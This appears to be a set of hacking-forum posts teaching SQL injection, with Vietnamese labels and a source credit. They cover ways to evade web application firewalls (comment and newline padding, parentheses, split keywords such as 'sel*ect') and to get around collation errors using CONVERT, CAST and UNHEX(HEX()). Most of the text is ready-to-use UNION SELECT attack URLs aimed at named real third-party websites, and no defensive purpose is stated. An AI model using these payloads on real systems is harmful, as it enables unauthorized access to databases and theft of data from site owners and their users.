SQL injection Bypass WAF

Mã:

1. adding /**/ or %0A instead of white spaces

So instead of

Code:

Mã:

union select 1,2,3,4,5

we use

Code:

Mã:

/**/union/**/select/**/1,2,3,4,5

or

Code:

Mã:

%0Aunion%0Aselect%0A1,2,3,4,5

2. using ( )

Instead of

Code:

Mã:

union select 1,2,3,4,5

we use

Code:

Mã:

union(select(1),(2),(3),(4),(5))

or

Code:

Mã:

union(select(1),2,3,4,5)

---

Helo guyz
here is part 2 finally 

the bypass waf wad done by
ajkaro ( HF member )
my greetings to him 

I will just do it tutorial 

Lets start
here is the vulnerability site we will use 

Code:

Mã:

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=117

Code:

Mã:

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-117 UNION SELECT 1,2,3,4,5,6,7,8,9--

cant find vuln column!



Lets try bypass waf 

Code:

Mã:

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-117+union /*!select*/ 1,2,3,4,version(),6,7,8,9--+

Same resultat lets use other bypass

Now Solutions ! 

This time we can notice beside command select also all characters * are missing. All * were cut out by WAF.

Now we will use some logic. If command select is filtered out we will mask it so WAF will not detect it. And we will "attack" WAF with its own weapon. We will use character *

and here the solution

Code:

Mã:

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-117+union sel*ect 1,2,3,4,version(),6,7,8,9--+

OR

Code:

Mã:

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-117+union SELselectECT 1,2,3,4,version(),6,7,8,9--+

---

Look today i am going to show you how to bypass illegal mix of collations on SQLI 
Well
Theres 3 ways to

Lets take example

Code:

Mã:

http://www.andytimmons.com/video.php?id=0004 and 0 UNION SELECT 1,version(),3,4,5,6,7,8--

1. Define COLLATE
SELECT * FROM table ORDER BY somekey COLLATE latin1_general_ci;

We can use different collation names:
latin1_general_ci
utf8_general_ci
utf8_unicode_ci
latin1_german1_ci
latin1_swedish_ci
...
...
A name ending in _ci indicates a case-insensitive collation.
A name ending in _cs indicates a case-sensitive collation.
A name ending in _bin indicates a binary collation. Character comparisons are based on character binary code values.

2. Use function CONVERT
CONVERT() provides a way to convert data between different character sets. The syntax is:

CONVERT(expr USING transcoding_name)

Example:

Code:

Mã:

http://www.andytimmons.com/video.php?id=0004 and 0 UNION SELECT 1,convert(version() using binary),3,4,5,6,7,8--

3. Use function CAST
You may also use CAST() to convert a string to a different character set. The syntax is:

CAST(character_string AS character_data_type CHARACTER SET charset_name)

Example:

Code:

Mã:

http://www.andytimmons.com/video.php?id=0004 and 0 UNION SELECT 1,cast(version() as binary),3,4,5,6,7,8--

4. Use function UNHEX(HEX(xx))
UNHE) --> Return a string containing hex representation
HE) --> Return a hexadecimal representation of a decimal or string value

Example:

Code:

Mã:

http://www.andytimmons.com/video.php?id=0004 and 0 UNION SELECT 1,UNHEX(HEX(version())),3,4,5,6,7,8--

Chú Ý:

Coppy phải ghi rõ nguồn Hacking Security